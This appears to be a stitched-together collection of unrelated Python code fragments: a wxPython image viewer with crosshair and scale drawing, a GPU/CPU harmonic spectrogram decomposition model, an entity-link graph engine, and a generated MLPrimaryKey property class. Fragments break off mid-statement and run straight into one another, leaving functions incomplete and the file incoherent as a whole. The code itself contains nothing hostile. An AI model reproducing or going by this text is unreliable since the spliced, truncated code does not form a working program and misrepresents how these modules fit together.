"Coordinates of cross displayed on the image in pixels from top left")
def GetScale(self):
"Returns list of tuples [(x1,y1),(x2,y2)]"
return self.scale
def SetScale (self,line):
"'line' must be a list of tuples [(x1,y1),(x2,y2)]"
self.scale = line
self.Refresh()
Scale = property(GetScale,SetScale,doc="""movable measurement line drawn
on the image, format [(x1,y1),(x2,y2)]""")
def GetScaleUnit(self):
"mm or pixels"
if self.PixelSize != 1: return "mm"
else: return "pixels"
ScaleUnit = property(GetScaleUnit)
def origin(self):
"""
Top left corner of the image in virtual pixel coordinates.
(Orgin: top left of the vitual scrolling area = (0,0)).
By default, a Scrolled Window places its active area in the top
left, if it is smaller than the window size.
Instead, I want it centered in the window.
The function calculates the active area origin as function of window
size.
"""
width,height = self.GetSizeTuple()
x = (width - self.Image.shape[-2]*self.ScaleFactor)/2
y = (height - self.Image.shape[-1]*self.ScaleFactor)/2
if x<0: x = 0
if y<0: y = 0
return x,y
def rotate(self,point):
"used to apply the rotation to the image center to the cross-hair"
if point == None: return
(x,y) = point
(w,h) = (self.Image.shape[-2],self.Image.shape[-1])
if self.orientation == 0: return (x,y)
if self.orientation == -90: return (h-y,x)
if self.orientation == 90: return (y,w-x)
if self.orientation == 180: return (w-x,h-y)
return (x,y)
def unrotate(self,point):
"used to apply the rotation to the image center to the cross-hair"
if point == None: return
(x,y) = point
(w,h) = (self.Image.shape[-2],self.Image.shape[-1])
if self.orientation == 0: return (x,y)
if self.orientation == -90: return (y,h-x)
if self.orientation == 90: return (w-y,x)
if self.orientation == 180: return (w-x,h-y)
return (x,y)
def OnPaint (self,event):
"""Called by WX whenever the contents of the window
needs re-rendering. E.g. when the window is brought to front,
uncovered, restored from minimized state."""
dc = wx.PaintDC(self)
dc = wx.BufferedDC(dc) # avoids flickering
self.PrepareDC(dc)
# Need to fill the area no covered by the image
# because automatic background erase was turned off.
dc.SetBrush (wx.Brush("GREY"))
dc.SetPen (wx.Pen("GREY",0))
width,height = self.GetSizeTuple()
dc.DrawRectangle (0,0,width,height)
# This centers the image in the window, if the window is larger than
# the image.
if dc.GetDeviceOriginTuple() == (0,0):
dc.SetDeviceOrigin(*self.origin())
self.draw(dc)
def OnEraseBackground(self, event):
"""Override default background fill, avoiding flickering"""
def draw (self,dc):
"""Render the contents of the window."""
from numpy import uint8,ndarray
from time import time; t = [time()]; m = ""
# Compress the dynamic range from 0...SaturationLevel to 0...256.
scale = 255./max(self.SaturationLevel,1)
image = minimum(self.Image*scale,255).astype(uint8)
t += [time()]; m += "Scale to 8 bits %.3f s\n" % (t[-1]-t[-2])
# Convert from gray scale to RGB format if needed.
if image.ndim < 3:
w,h = self.Image.shape[-2:]
RGB = ndarray((3,w,h),uint8,order="F")
RGB[0],RGB[1],RGB[2] = image,image,image
image = RGB
t += [time()]; m += "RGB array %.3f s\n" % (t[-1]-t[-2])
# Superimpose the mask if present.
if self.show_mask and self.Mask != None:
mask = self.Mask
R,G,B = image
r,g,b = self.mask_color
x = self.mask_opacity
R[mask] = (1-x)*R[mask]+x*r
G[mask] = (1-x)*G[mask]+x*g
B[mask] = (1-x)*B[mask]+x*b
t += [time()]; m += "Mask %.3f s\n" % (t[-1]-t[-2])
# Convert image from numpy to WX image format.
##data = image.T.tostring()
##t += [time()]; m += "Transpose %.3f s\n" % (t[-1]-t[-2])
data = image
w,h = self.Image.shape[-2:]
image = wx.ImageFromData(w,h,data)
t += [time()]; m += "WX image %.3f s\n" % (t[-1]-t[-2])
# Scale the image.
w = image.Width * self.ScaleFactor
h = image.Height * self.ScaleFactor
# Use 'quality=wx.IMAGE_QUALITY_HIGH' for bicubic and box averaging
# resampling methods for upsampling and downsampling respectively.
if self.ScaleFactor < 1: quality = wx.IMAGE_QUALITY_HIGH
else: quality = wx.IMAGE_QUALITY_NORMAL
image = image.Scale(w,h) ## quality=quality
t += [time()]; m += "Resample %.3f s\n" % (t[-1]-t[-2])
if self.orientation == 90: image=image.Rotate90(clockwise=False)
if self.orientation == -90: image=image.Rotate90(clockwise=True)
if self.orientation == 180: image=image.Rotate90().Rotate90()
t += [time()]; m += "Rotate %.3f s\n" % (t[-1]-t[-2])
bitmap = wx.BitmapFromImage(image)
t += [time()]; m += "WX bitmap %.3f s\n" % (t[-1]-t[-2])
dc.DrawBitmap (bitmap,0,0)
t += [time()]; m += "Render %.3f s\n" % (t[-1]-t[-2])
self.draw_crosshair(dc)
self.draw_box(dc)
self.draw_scale(dc)
t += [time()]; m += "Annotate %.3f s\n" % (t[-1]-t[-2])
m += "Total %.3f s\n" % (t[-1]-t[0])
##print m
def draw_crosshair (self,dc):
"Indicates the X-ray beam position as a cross"
if self.show_crosshair and self.crosshair != None:
dc.SetPen (wx.Pen(self.crosshair_color,1))
w,h = self.crosshair_size
x1,y1 = self.pixel((-w/2,0)); x2,y2 = self.pixel((+w/2,0))
dc.DrawLine (x1,y1,x2,y2)
x1,y1 = self.pixel((0,-h/2)); x2,y2 = self.pixel((0,+h/2))
dc.DrawLine (x1,y1,x2,y2)
def draw_box (self,dc):
"Draws a box around the cross hair to indicate X-ray beam size."
if self.show_box:
w,h = self.boxsize
x1,y1 = self.pixel((w/2,h/2))
x2,y2 = self.pixel((-w/2,-h/2))
dc.SetPen (wx.Pen(self.box_color,1))
dc.DrawLines ([(x1,y1),(x2,y1),(x2,y2),(x1,y2),(x1,y1)])
def draw_scale (self,dc):
if not self.show_scale or self.scale == None: return
P1,P2 = self.scale
x1,y1 = self.pixel(P1)
x2,y2 = self.pixel(P2)
dc.SetPen (wx.Pen(self.scale_color,1))
dc.DrawLine (x1,y1,x2,y2)
length = distance(P1,P2)
if self.ScaleUnit == "mm":
if length < 1: label = "%.0f um" % (length*1000)
else: label = "%.3f mm" % length
else: label = "%g %s" % (length,self.ScaleUnit)
font = wx.SystemSettings.GetFont(wx.SYS_DEFAULT_GUI_FONT)
font.SetPointSize(10)
dc.SetFont(font)
dc.SetTextForeground(self.scale_color)
w,h = dc.GetTextExtent(label)
cx = (x1+x2)/2; cy = (y1+y2)/2
phi = atan2(y2-y1,x2-x1)
tx = cx - (w/2*cos(phi) - h*sin(phi))
ty = cy - (h*cos(phi) + w/2*sin(phi))
dc.DrawRotatedText (label,tx,ty,-phi/pi*180)
if self.scale_selected: # Highlight the end points by 5x5 pixel squares
dc.DrawRectangle(x1-2,y1-2,4,4)
dc.DrawRectangle(x2-2,y2-2,4,4)
def pixel(self,(x,y)):
"Converts from mm (x,y) to virtual pixel coordinates"
if self.crosshair != None: center = self.crosshair
else: center = (self.Image.shape[-2]/2,self.Image.shape[-1]/2)
px = int(round((x/self.PixelSize+center[0])*self.ScaleFactor))
py = int(round((-y/self.PixelSize+center[1])*self.ScaleFactor))
return px,py
def point(self,(px,py)):
"Converts from pixel virtual (px,py) to mm (x,y) coordinates"
if self.crosshair != None: center = self.crosshair
else: center = (self.Image.shape[-2]/2,self.Image.shape[-1]/2)
x = (px/self.ScaleFactor-center[0])*self.PixelSize
y = -(py/self.ScaleFactor-center[1])*self.PixelSize
return x,y
def SetStatusText(self,status_text):
"display the in the status bar of te top level window"
window = self.Parent
while not hasattr(window,"SetStatusText"): window = window.Parent
window.SetStatusText(status_text)
def OnLeftButtonEvent (self,event):
"for dragging the crosshair or scale"
# This makes sure that keyboard input goes to this window seleting
# it by clicking the mouse button inside.
# It makes also sure that mouse wheel events are received.
if event.LeftDown(): self.SetFocus()
p = self.cursor_pos(event)
if event.LeftDown() or event.Dragging():
# Report the image pixle coordinates and pixel intenity at the
# Cursor position in the window's status bar.
from math import floor
x,y | |
else:
accumulate_local_X(Xcomp, indexes, *Xcomp.shape[1:], self.n_freqs, X)
compute_X()
return X
def fit(self, org_Y, n_iter=100, update_flags=[True,True,True], post_process=None, log_interval=10):
'''Fit model to `org_Y`
Args:
org_Y (xp.ndarray): Observed magnitude spectrogram, n_freqs x n_frames
n_iter (int): # of iterations
update_flags (list[bool]): Update flags for U, q(w^2), A, and Omega
post_process (func): Post process ivoked every `log_interval` iterations
log_interval (int): # of iterations for logging and post process
'''
xp = cupy.get_array_module(org_Y)
# normalization
Y = self.normalize_spectrogram(org_Y)
X = xp.zeros_like(Y)
# prepare
ln_n = xp.log(xp.arange(1, self.n_harmonics+1)).astype(X.dtype) # n_harmonics
width = int(max(self.min_calc_range, numpy.round(self.calc_width*self.sigma*2.0/self.dx)))
width_range = xp.arange(width).astype('i') # width
Ylambda = xp.zeros((self.n_bases, self.n_frames, self.n_harmonics, width), dtype=X.dtype)
# U: n_bases x n_frames
# w: n_bases x n_harmonics
# Omega: n_bases x n_frames
def compute_lnG():
Omega_ln_n = ln_n[None,None,:] + self.Omega[:,:,None] # n_bases x n_frames x n_harmonics
leftsides = Omega_ln_n - self.x[0] - width/2.0*self.dx
leftsides = xp.clip(
xp.around(leftsides/self.dx).astype('i'),
0, self.n_freqs-1 - width
)
indexes = leftsides[:,:,:,None] + width_range[None,None,None,:] # n_bases x n_frames x n_harmonics x width
lnG = -(self.x[indexes] - Omega_ln_n[:,:,:,None]).astype('f')**2 /(2.0*self.sigma**2)
return lnG, indexes
def compute_X():
lnG, indexes = compute_lnG() # n_bases x n_frames x n_harmonics x width
Xcomp = xp.exp(lnG) * (self.U[:,:,None,None] * self.w[:,None,:,None]) # n_bases x n_frames x n_harmonics x width
X[:] = 0.0
# accumulate_local_X(Xcomp, indexes, *Xcomp.shape[1:], self.n_freqs, X)
if xp == numpy:
accumulate_local_X_cpu(Xcomp, indexes, *Xcomp.shape[1:], self.n_freqs, X)
else:
accumulate_local_X(Xcomp, indexes, *Xcomp.shape[1:], self.n_freqs, X)
def update_Ylambda():
lnG, indexes = compute_lnG() # n_bases x n_frames x n_harmonics x width
Xcomp = xp.exp(lnG) * (self.U[:,:,None,None] * self.w[:,None,:,None]) # n_bases x n_frames x n_harmonics x width
X[:] = 0.0
# accumulate_local_X(Xcomp, indexes, *Xcomp.shape[1:], self.n_freqs, X)
if xp == numpy:
accumulate_local_X_cpu(Xcomp, indexes, *Xcomp.shape[1:], self.n_freqs, X)
else:
accumulate_local_X(Xcomp, indexes, *Xcomp.shape[1:], self.n_freqs, X)
# X[:] = xp.maximum(self.eps, X[:])
Ylambda[:] = 0.0
if xp == numpy:
compute_Ylambda_helper_cpu(Xcomp, indexes, X, Y, *Xcomp.shape[1:], self.n_freqs, Ylambda) # n_bases x n_frames x n_harmonics x width
else:
compute_Ylambda_helper(Xcomp, indexes, X, Y, *Xcomp.shape[1:], self.n_freqs, Ylambda) # n_bases x n_frames x n_harmonics x width
return indexes
def update_U():
numU = Ylambda.sum(axis=(2,3)) + self.alpha_U-1
numU[numU<0]=0
denomU = self._const + self.beta_U
newU = xp.maximum(self.eps, numU/denomU)
return newU
def update_w():
new_w = Ylambda.sum(axis=(1,3))/xp.maximum(self.eps, self._const*self.U.sum(axis=1,keepdims=True)) # n_bases x n_harmonics
new_w = xp.maximum(self.eps, new_w/new_w.sum(axis=1,keepdims=True))
return new_w
def update_Omega(l_indexes):
# prepare
main_diag_of_DtD = xp.pad(xp.ones((self.n_frames-2,), dtype=self.Omega.dtype)*2, ((1,1),), mode="constant", constant_values=1.0) # n_frames
# denom
denom_main_diag = Ylambda.sum(axis=(2,3))/(self.sigma**2) # n_bases x n_frames
denom_main_diag += self.alpha_global / self.v2 + main_diag_of_DtD[None,:] * (self.alpha_local / self.tau2)
denom_lower_diag = -xp.ones((self.n_bases, self.n_frames-1), dtype=self.Omega.dtype) * (self.alpha_local / self.tau2)
# numel
# TODO: use update_Omega_helper
new_Omega = (((self.x[l_indexes] - ln_n[None,None,:,None]) * Ylambda).sum(axis=(2,3))/(self.sigma**2)) # n_bases x n_frames
new_Omega += self.mu[:,None]*self.alpha_global/self.v2
# solve tridiagonal systems
if xp == numpy:
batched_gtsv_cpu(denom_lower_diag, denom_main_diag, denom_lower_diag, new_Omega)
else:
batched_gtsv(denom_lower_diag, denom_main_diag, denom_lower_diag, new_Omega)
return new_Omega
def get_loss():
X[:] = xp.maximum(X, self.eps)
ll = (Y * xp.log(X) - X).sum()
prior = -((self.Omega - self.mu[:,None])**2/(2*self.v2)).sum() * self.alpha_global
prior += -((self.Omega[:,:self.n_frames-1] - self.Omega[:,1:])**2/(2*self.tau2)).sum() * self.alpha_local
# U prior
prior += ((self.alpha_U-1)*xp.log(self.U) - self.beta_U*self.U).sum()
return -(ll+prior)
for iter in range(n_iter):
if update_flags[0]:
comp_freq_indexes = update_Ylambda()
self.U[:] = update_U()
if update_flags[1]:
comp_freq_indexes = update_Ylambda()
self.w[:] = update_w()
if update_flags[2]:
comp_freq_indexes = update_Ylambda()
self.Omega[:] = update_Omega(comp_freq_indexes)
compute_X()
# get loss
if iter == 0 or (iter+1)%log_interval==0 or iter == n_iter - 1:
loss = get_loss()
logger.info("{}/{}: {}".format(iter+1, n_iter, loss))
if post_process is not None:
post_process(iter+1)
class SFHTFD(BaseSeparator):
'''Source-filter harmonic-temporal factor decomposition (SF-HTFD)
'''
@property
def E_w(self):
return NakagamiDistribution.E_w(self.w_a,
self.w_b,
self.xp,
approx=self.use_approx_Nakagami)
@property
def E_ln_w(self):
return NakagamiDistribution.E_ln_w(self.w_a,
self.w_b,
self.xp,
approx=self.use_approx_Nakagami)
@property
def E_w2(self):
return NakagamiDistribution.E_w2(self.w_a, self.w_b, self.xp)
@property
def w_mask(self):
'''
Returns:
xp.ndarray: whether the frequency is out of bound, n_filters x n_bases x n_frames x n_harmonics
'''
xp = self.xp
n = xp.arange(1, self.n_harmonics + 1).astype(
self.Omega.dtype) # n_bases x n_frames
return xp.exp(
self.Omega[:, :, :, None]) * n[None, None, None, :] < numpy.pi
def _compute_squared_Az(self):
xp = self.xp
n = xp.arange(1, self.n_harmonics + 1).astype(
self.Omega.dtype) # n_bases x n_frames
omega = xp.exp(self.Omega[:, :, :, None]) * n[
None, None,
None, :] # n_filters x n_bases x n_frames x n_harmonics
# A: n_filters x filter_deg+1
real = xp.zeros(
(self.n_filters, self.n_bases, self.n_frames, self.n_harmonics),
dtype=omega.dtype)
imag = xp.zeros(
(self.n_filters, self.n_bases, self.n_frames, self.n_harmonics),
dtype=omega.dtype)
for q in range(self.A.shape[1]):
real += xp.cos(-omega * q) * self.A[:, q, None, None, None]
imag += xp.sin(-omega * q) * self.A[:, q, None, None, None]
squared_Az = real * real + imag * imag
valid_mask = omega < numpy.pi
return squared_Az, valid_mask
@property
def inv_squared_Az(self):
squared_Az, valid_mask = self._compute_squared_Az()
F = 1.0 / squared_Az
check_naninf(F, self.xp)
return F, valid_mask
def init_params(self, n_filters, filter_degree=16, normalize_ar_coeffs=True,input_normalization="average", use_approx_Nakagami=False):
''' Parameter initialization
Args:
n_filters (int): # of filters
filter_degree (int): Filter degree
normalize_ar_coeffs (bool): If True, normalize a so that a <- a/a[0]
input_normalization (str): Input normalization method
use_approx_Nakagami (bool): If True, the expectations related to the Nakagami distribution are approximately computed (slightly fast but not exact).
'''
self.use_approx_Nakagami = use_approx_Nakagami
self.n_filters = n_filters
self._input_normalization = input_normalization
self.Omega = numpy.tile(self.mu[None, :, None], (self.n_filters, 1, self.n_frames)).astype('f') # n_filters x n_bases x n_frames
initA = numpy.poly(numpy.ones(filter_degree - 1) * 0.1 + self.random_state.uniform(-0.01, 0.01, size=(filter_degree - 1, ))).astype('f')
self.A = numpy.tile(initA[None, :], (self.n_filters, 1)) # n_filters x filter_degree+1
self.normalize_ar_coeffs = normalize_ar_coeffs
if self.normalize_ar_coeffs:
self.A /= self.A[:, 0, None]
self.w_a = numpy.ones((self.n_filters, self.n_bases, self.n_frames, self.n_harmonics), dtype='f') # n_filters x n_bases x n_frames x n_harmonics
inv_squared_Az, valid_mask = self.inv_squared_Az
self.w_b = (2.0 * inv_squared_Az).astype('f') # n_filters x n_bases x n_frames x n_harmonics
# self.w_b[self.xp.logical_not(valid_mask)] = self.xp.nan
self.U = self.random_state.uniform(0.0, 1.0, size=(self.n_filters, self.n_bases, self.n_frames)).astype('f')
########
self._transferred_arrays += ["Omega", "A", "w_a", "w_b", "U"]
def init_priors(self, lnF0s, alpha_U=0.1, sigma=numpy.log(2.0) / 60.0, dt=0.01, n_DAP_iter=1, pole_mag_thresh=0.99, alphas_Omega=[1, 1]):
'''Prior initialization
Args:
lnF0s (numpy.ndarray): Center log-fundamental frequencies of spectral bases [log-rad]
'''
self.pole_mag_thresh = pole_mag_thresh
self.n_DAP_iter = n_DAP_iter
self.alpha_global = numpy.float32(alphas_Omega[0])
self.alpha_local = numpy.float32(alphas_Omega[1])
self.sigma = numpy.float32(sigma)
self._const = numpy.float32(sigma * numpy.sqrt(2.0 * numpy.pi) / self.dx)
#
self.alpha_U = numpy.float32(alpha_U)
self.beta_U = 1.0
self.mu = lnF0s.astype('f') # n_bases
self.tau2 = numpy.float32((numpy.log(2) / 12 / (1 / 6) * dt))**2.0
self.v2 = numpy.float32((numpy.log(2) / 12.0 / 3.0))**2.0
self._transferred_arrays += ["mu"]
def fit(self, org_Y, n_iter=100, update_flags=[True, True, True, True], post_process=None, log_interval=10):
'''
Args:
org_Y (xp.ndarray): Observed magnitude spectrogram, n_freqs x n_frames
n_iter (int): # of iterations
update_flags (list[bool]): Update flags for U, q(w^2), A, and Omega
post_process (func): Post process ivoked every `log_interval` iterations
log_interval (int): # of iterations for logging and post process
'''
xp = cupy.get_array_module(org_Y)
# normalization
Y = self.normalize_spectrogram(org_Y)
# prepare
X = xp.zeros_like(Y)
ln_n = xp.log(xp.arange(1, self.n_harmonics + 1)).astype(X.dtype) # n_harmonics
width = int(max(self.min_calc_range, numpy.round(self.calc_width * self.sigma * 2.0 / self.dx)))
width_range = xp.arange(width).astype('i') # width
# Auxiliary variable: n_filters x n_bases x n_frames x n_harmonics x width (frequency bin)
Ylambda = xp.zeros((self.n_filters, self.n_bases, self.n_frames, self.n_harmonics, width), dtype=X.dtype)
# U: n_filters x n_bases x n_frames
# A: n_filters x filer_degree+1
# w_a, w_b: n_filters x n_bases x n_frames x n_harmonics
# Omega: n_bases x n_frames
def compute_G():
ln_omega = ln_n[None, None, None, :] + self.Omega[:, :, :, None] # n_filters x n_bases x n_frames x n_harmonics
leftsides = ln_omega - self.x[0] - width / 2.0 * self.dx
leftsides = xp.around(leftsides / self.dx).astype('i')
indexes = leftsides[:, :, :, :, None] + width_range[None, None, None, None, :] # n_filters x n_bases x n_frames x n_harmonics x width
if xp == numpy:
G = xp.zeros(indexes.shape, dtype='f')
compute_G_cpu(self.x.astype('f'), indexes.reshape(-1, *indexes.shape[2:]), ln_omega.reshape(-1, *ln_omega.shape[2:]).astype('f'), self.sigma, width, self.n_freqs, G.reshape(-1, *G.shape[2:]))
elif xp == cupy:
G = compute_G_helper(self.x, indexes, ln_omega, self.sigma, width, self.n_freqs)
else:
raise UnknownNdarrayModuleError(xp)
return G, indexes
def compute_X():
G, indexes = compute_G(
) # n_filters x n_bases x n_frames x n_harmonics x width
valid_mask = self.w_mask # n_filters x n_bases x n_frames x n_harmonics
Xcomp = G * self.U[:, :, :, None,
None] * self.E_w[:, :, :, :,
None] # n_filters x n_bases x n_frames x n_harmonics x width
Xcomp *= valid_mask[..., None]
X[:] = 0.0
# accumulate_local_X(Xcomp.reshape(-1, *Xcomp.shape[2:]), indexes.reshape(-1, *indexes.shape[2:]), *[int(_) for _ in Xcomp.shape[2:]], self.n_freqs, X)
if xp == numpy:
accumulate_local_X_cpu(Xcomp.reshape(-1, *Xcomp.shape[2:]), indexes.reshape(-1, | |
members of the current meme. E.g. we
don't want to create members when we are running a restore from DB at engine startup
If restore is True, then the current entity is being restored from the database and
we don't want to either create members (they already exist) or set the properties,
as property state exists in the DB tables and may not be the same as initial.
"""
method = moduleName + '.' + self.className + '.mergeEnhancement'
global linkRepository
#logQ.put( [logType , logLevel.DEBUG , method , "entering"])
self.tags.extend(parentMeme.tags)
self.tags = filterListDuplicates(self.tags)
if noMembers == False:
for memberMemeKey in parentMeme.memberMemes.keys():
occurs = parentMeme.memberMemes[memberMemeKey][0] #memermeme is a tuple with coocurence count at position 0 and linkType at position 1
lnkTyp = parentMeme.memberMemes[memberMemeKey][1]
if lnkTyp == 1:
unusedCatch = "me"
member = templateRepository.resolveTemplate(parentMeme.path, memberMemeKey)
n = 1
while n <= int(occurs):
try:
n = n+1
childEntityID = member.getEntityFromMeme(masterEntity)
#Now flag both entities as being linked
#All child entities created in this method have membership type = SUBATOMIC
#Don't bother locking the child for now as the public does not know about it yet
#memberID1, memberID2, membershipType, keyLink = None, masterEntity = None
#ToDo: cataloging of links is currently paremeter-less
#linkRepository.catalogLink(self.uuid, childEntityID, linkTypes.SUBATOMIC, {}, masterEntity)
linkRepository.catalogLink(self.uuid, childEntityID, lnkTyp, {}, masterEntity)
except Exception as e:
errprMsg = "Problem instantiating child meme of %s. Entity initialization aborted! Traceback = %s" %(parentMeme.path.fullTemplatePath, e)
#logQ.put( [logType , logLevel.DEBUG , method , "exiting"])
#debug
#childEntityID = member.getEntityFromMeme(masterEntity)
#linkRepository.catalogLink(self.uuid, childEntityID, linkTypes.SUBATOMIC, {}, masterEntity)
print(errprMsg)
break
if restore == False:
for memePropKey in parentMeme.properties.keys():
memeProperty = parentMeme.properties[memePropKey]
try:
#We really don't need to be storing entity property types as unicide strings!
if memeProperty.propertyType == "integer":
self.addIntegerProperty(memeProperty.name, memeProperty.value, memeProperty.constrained, memeProperty.restMin, memeProperty.restMax, memeProperty.restList, parentMeme.path)
elif memeProperty.propertyType == "boolean":
#need to add a boolean function
self.addBooleanProperty(memeProperty.name, memeProperty.value, memeProperty.constrained, memeProperty.restMin, memeProperty.restMax, memeProperty.restList, parentMeme.path)
#newProp = EntityProperty(memeProperty.name, memeProperty.value, entityPropTypes.Boolean, memeProperty.constrained, memeProperty.restMin, memeProperty.restMax, memeProperty.restList, parentMeme.path)
#self.properties[memeProperty.name] = newProp
elif memeProperty.propertyType == "decimal":
self.addDecimalProperty(memeProperty.name, memeProperty.value, memeProperty.constrained, memeProperty.restMin, memeProperty.restMax, memeProperty.restList, parentMeme.path)
elif memeProperty.propertyType == "list":
self.addListProperty(memeProperty.name, memeProperty.value, memeProperty.constrained, memeProperty.restMin, memeProperty.restMax, memeProperty.restList, parentMeme.path)
else:
self.addStringProperty(memeProperty.name, memeProperty.value, memeProperty.constrained, memeProperty.restMin, memeProperty.restMax, memeProperty.restList, parentMeme.path)
except Exception as e:
errprMsg = "Unable to create property %s on %s entity %s. Traceback = %s" %(memeProperty.name,parentMeme.path.fullTemplatePath, self.uuid, e)
logQ.put( [logType , logLevel.WARNING , method , errprMsg])
#logQ.put( [logType , logLevel.DEBUG , method , "exiting"])
def revertPropertyValues(self, drillDown = False):
""" Reset property values to their original values as defined in the parent meme(s).
It does not affect custom properties or properties from depricated memes"""
#method = moduleName + '.' + self.className + '.revertPropertyValues'
#logQ.put( [logType , logLevel.DEBUG , method , "entering"])
for propertyKey in self.properties.keys():
prop = self.properties[propertyKey]
if prop.memePath is not None:
meme = templateRepository.resolveTemplateAbsolutely(self.memePath.fullTemplatePath)
memeProperty = meme.properties[propertyKey]
prop.value = memeProperty.value
#First check the parent meme for the property
#for memePropertyName in entityMeme.properties.iterkeys():
#if memePropertyName == propertyKey:
#memeProperty = entityMeme.properties[memePropertyName]
#prop.value = memeProperty.value
#updated = True
# # if we did not find the property in that meme, check the other memes
'''if updated == False:
enhancingMemesList = enhancementIndex.getEnhancements(self.memePath)
for enhancingMemeID in enhancingMemesList:
if updated == False:
enhancingMeme = templateRepository.resolveTemplateAbsolutely(enhancingMemeID)
for memePropertyName in enhancingMeme.properties.iterkeys():
if memePropertyName == propertyKey:
memeProperty = entityMeme.properties[memePropertyName]
prop.value = memeProperty.value
updated = True
'''
if drillDown == True:
links = linkRepository.getCounterparts(self.uuid)
for memberEntityID in links:
try:
member = entityRepository.getEntity(memberEntityID)
member.entityLock.acquire(True)
try:
member.member.revertPropertyValues(True)
finally: member.entityLock.release()
except: pass
#logQ.put( [logType , logLevel.DEBUG , method , "exiting"])
def removeAllCustomProperties(self, drillDown = True):
""" Remove all properties that do not come from a meme"""
#method = moduleName + '.' + self.className + '.removeAllCustomProperties'
#logQ.put( [logType , logLevel.DEBUG , method , "entering"])
deleteList = []
for propertyKey in self.properties.keys():
templateProperty = self.properties[propertyKey]
if templateProperty.memePath is None:
#if it has no memePath, then it is a custom property
deleteList.append(propertyKey)
for delPath in deleteList:
del self.properties[delPath]
if delPath in self.propertyChangeEvents:
del self.propertyChangeEvents[delPath]
if drillDown == True:
links = linkRepository.getCounterparts(self.uuid)
for memberEntityID in links:
try:
member = entityRepository.getEntity(memberEntityID)
member.entityLock.acquire(True)
try:
member.removeAllCustomProperties(True)
finally: member.entityLock.release()
except: pass
#logQ.put( [logType , logLevel.DEBUG , method , "exiting"])
def getHasLinkedEntityByMemeType(self, meme, splitMetaMemePath = None, linkType = 0):
""" """
#method = moduleName + '.' + self.className + '.getHasLinkedEntityByMemeType'
#logQ.put( [logType , logLevel.DEBUG , method , "entering"])
hasMember = False
try:
findList = self.getLinkedEntitiesByMemeType(meme, splitMetaMemePath, linkType)
if len(findList) > 0:
hasMember = True
except:
pass
#memberToFind = entityRepository.getEntity(uuid)
#for memberEntityEntry in self.memberEntities:
#memberEntityID = memberEntityEntry[0]
#member = entityRepository.getEntity(memberEntityID)
#if member.memePath == meme.path.fullTemplatePath:
#hasMember = True
#logQ.put( [logType , logLevel.DEBUG , method , "exiting"])
return hasMember
#Todo - add getCounterparts params to method call
def getAreEntitiesLinked(self, uuid, memBershipType = 0, ):
""" """
#method = moduleName + '.' + self.className + '.getAreEntitiesLinked'
#logQ.put( [logType , logLevel.DEBUG , method , "entering"])
hasMember = False
members = linkRepository.getCounterparts(self.uuid, linkDirectionTypes.BIDIRECTIONAL, [], [], memBershipType)
if uuid in members:
hasMember = True
#logQ.put( [logType , logLevel.DEBUG , method , "exiting"])
return hasMember
def getIsSingleton(self):
""" """
#method = moduleName + '.' + self.className + '.getIsSingleton'
#logQ.put( [logType , logLevel.DEBUG , method , "entering"])
parentMeme = templateRepository.resolveTemplateAbsolutely(self.memePath.fullTemplatePath)
isSingleton = parentMeme.isSingleton
#logQ.put( [logType , logLevel.DEBUG , method , "exiting"])
return isSingleton
def getLinkIDs(self):
""" Get all of the UUIDs for all links involving this entity"""
#method = moduleName + '.' + self.className + '.getLinkIDs'
filteredLinkList = []
try:
sourceID = self.uuid
filteredLinkList = linkRepository.getAllLinks(sourceID)
#filteredLinkTuples= linkRepository.getAllLinks(sourceID)
#for filteredLinkTuple in filteredLinkTuples:
# filteredLinkList.append(filteredLinkTuple[0])
except Exception as e:
unusedDummy = e #dummy variable declaration to prevent false alarm pydev warnings when debug statement is commented out
#logQ.put( [logType , logLevel.DEBUG , method , "Failure getting link IDs. Traceback = %s" %e])
pass
return filteredLinkList
def getLinkedEntitiesByMemeType(self, memePath, splitMetaMemePath = None, linkType = 0):
""" Find the member entities at the end of the Member Path.
May be called with a composite path (e.g. Inventory.Inventory::Loot.GoldCoin) in meme
or may be called with an explicitly regression split member path (which is a list)
examples:
entities = self.getMemberEntiesByType('Inventory.Inventory::Loot.GoldCoin')
entities = self.getMemberEntiesByType(None, ['Inventory.Inventory', 'Loot.GoldCoin'])
"""
#method = moduleName + '.' + self.className + '.getLinkedEntitiesByMemeType'
#logQ.put( [logType , logLevel.DEBUG , method , "entering"])
returnMembers = self.getLinkedEntitiesByTemplateType(memePath, True, linkType, False, [], True, None)
#logQ.put( [logType , logLevel.DEBUG , method , "exiting"])
return returnMembers
def getLinkedEntitiesByMetaMemeType(self, metaMemePath, linkType = 0, returnUniqueValuesOnly = True):
""" Find the member entities at the end of the Member Path.
May be called with a composite path (e.g. Inventory.Inventory::Loot.GoldCoin) in meme
or may be called with an explicitly regression split member path (which is a list)
examples:
entities = self.getMemberEntiesByType('Inventory.Inventory::Loot.GoldCoin')
entities = self.getMemberEntiesByType(None, ['Inventory.Inventory', 'Loot.GoldCoin'])
"""
#method = moduleName + '.' + self.className + '.getLinkedEntitiesByMetaMemeType'
#logQ.put( [logType , logLevel.DEBUG , method , "entering"])
returnMembers = self.getLinkedEntitiesByTemplateType(metaMemePath, False, linkType, False, [], returnUniqueValuesOnly, None)
#logQ.put( [logType , logLevel.DEBUG , method , "exiting"])
return returnMembers
def buildClusterMemberMetadata(self, rawCluster):
"""
This is a method for refining the raw entity member data into metadata
"""
clusterMetadata = {}
for rawClusterEntry in rawCluster:
dictKey = getUUIDAsString(rawClusterEntry[1])
clusterMetadata[dictKey] = [rawClusterEntry[2], rawClusterEntry[3]]
return clusterMetadata
def getClusterMembers(self, linkType= 0, crossSingletons = False, excludeLinks = []):
"""
This method wraps getEntityCluster and then returns only the UUIDS of the members of the cluster
"""
#method = moduleName + '.' + self.className + '.getLinkedEntitiesByTemplateType'
#logQ.put( [logType , logLevel.DEBUG , method , "entering"])
entireCluster = self.getEntityCluster(linkType, crossSingletons, excludeLinks)
clusterMetaData = self.buildClusterMemberMetadata(entireCluster)
#buildClusterMemberMetadata returns the UUIDs as strings, because UUIDs can't be used for indexing dicts.
# This method returns UUID objects however
returnMembersStrings = clusterMetaData.keys()
returnMembers = []
for returnMembersString in returnMembersStrings:
idAsUUID = uuid.UUID(returnMembersString)
returnMembers.append(idAsUUID)
return returnMembers
def getEntityCluster(self, linkType = 0, crossSingletons = False, excludeLinks = []):
""" This is a method is | |
self._inner_dict.get('version') # type: ignore
@version.setter
def version(self, value: Union[None, "VersionTagClass"]) -> None:
"""Setter: Version of the MLPrimaryKey"""
self._inner_dict['version'] = value
@property
def sources(self) -> List[str]:
"""Getter: Source of the MLPrimaryKey"""
return self._inner_dict.get('sources') # type: ignore
@sources.setter
